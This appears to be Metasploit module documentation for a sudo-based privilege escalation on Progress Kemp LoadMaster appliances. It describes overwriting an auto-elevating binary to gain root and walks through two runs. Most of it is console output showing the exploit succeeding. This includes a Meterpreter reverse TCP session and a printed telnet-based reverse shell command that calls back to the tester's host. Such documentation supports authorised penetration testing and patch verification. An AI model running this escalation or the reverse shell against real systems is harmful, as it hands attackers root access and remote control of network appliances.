## Vulnerable Application
Progress Kemp LoadMaster up to at least 7.2.59.2.22338.  The vendor is aware of this "feature," but
has chosen not to change the behavior.  It was originally paired with CVE-2024-1212, but as this
privilege escalation was not patched when CVE-2024-1212 was, we split it into its own module.
This exploit/feature allows the default `bal` user to run several binaries with the `sudo` prefix
that will elevate without prompting for a password.  As the configuration is based on filename and
the `bal` user has write permissions to these files, the `bal` user can simply write over the existing
binary with one of their choosing, then prefix it with `sudo` and launch the binary with `root`
privileges.
This module defaults to overwrite `/bin/loadkeys` with `/bin/bash`, though other binaries would work,
too.

For more details on the vulnerability:  
https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/

https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212

A trial VM which the exploit should work against out of the box can be downloaded from:
https://sso.kemptechnologies.com/register/kemp/vlm

The AWS marketplace also has free trials which can be used. These require the "session management" to be enabled in order for the exploit to work. Since by default the admin WUI is behind basic auth.
https://aws.amazon.com/marketplace/pp/prodview-kgh3dsfk7qcnw

Because this is an appliance, there are limited commands available for command-based payloads.

## Verification Steps
1. Install the application
1. Start msfconsole
1. Gain a session on a Progress Kemp Loadmaster target as the `bal` user
1. Do: `use exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024`
1. Do: `set SESSION <session>`
1. Do: `set LHOST <your host IP>`
1. Do: `run`
1. You should get a shell as the `root` user.

## Scenarios

### LoadMaster 7.2.59.0.22007
#### Metasploit Binary Dropper Payload
```msf
msf exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > show options

Module options (exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   SESSION        1                yes       The session to run this module on
   TARGET_BINARY  /bin/loadkeys    yes       The path for a binary file that has permission to auto-elevate.
   WRITABLE_DIR   /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Dropper



View the full module info with the info, or info -d command.

msf exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Found 3 indicators this is a KEMP product
[!] The service is running, but could not be validated.
[*] Writing payload to /tmp/.rypuliojtdch
[*] Moving /bin/loadkeys to /tmp/.qyiojnfbnfc
[*] Moving /tmp/.rypuliojtdch to /bin/loadkeys
[*] Running /bin/loadkeys
[+] Deleted /tmp/.rypuliojtdch
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.141:28850) at 2024-05-10 08:50:39 -0500
[*] Moving /tmp/.qyiojnfbnfc to /bin/loadkeys
[+] /bin/loadkeys returned to original contents

meterpreter > sysinfo
Computer     : 10.5.134.141
OS           : SuSE 7.2 (Linux 4.14.137)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > 


```

#### Reverse Bash Command Payload
```msf
msf exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > show options

Module options (exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   SESSION        1                yes       The session to run this module on
   TARGET_BINARY  /bin/loadkeys    yes       The path for a binary file that has permission to auto-elevate.
   WRITABLE_DIR   /tmp             yes       A directory where we can write files


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Command



View the full module info with the info, or info -d command.

msf exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > run

[+] sh -c '(sleep 4376|telnet 10.5.135.201 4444|while : ; do sh && break; done 2>&1|telnet 10.5.135.201 4444 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Found 3 indicators this is a KEMP product
[!] The service is running, but could not be validated.
[*] Preparing payload command
[*] Moving /bin/loadkeys to /tmp/.mnqdvfwutfd
[*] Moving /bin/bash to /bin/loadkeys
[*] Running payload command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo igZFhKRnh9GplIdu;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nigZFhKRnh9GplIdu\r\n"
[*] 
[*] Moving /tmp/.mnqdvfwutfd to /bin/loadkeys
[*] Matching...
[*] B is input...
[+] /bin/loadkeys returned to original contents

ls
azurelinuxagent
bin
cgroup
dev
dmZPnkPUPoV
etc
initial_setup.sh
lib
lib64
lost+found
mnt
one4net
openssl
proc
root
sbin
sks
sys
tmp
user
usr
var
touch tempfile
ls -l
total 51
drwxr-xr-x   5 root root  1024 Mar 22  2023 azurelinuxagent
.
.
.
-rw-r--r--   1 root root     0 May  3 17:02 tempfile
.
.
drwxr-xr-x  12 root root  1024 Mar 21 17:29 var
```
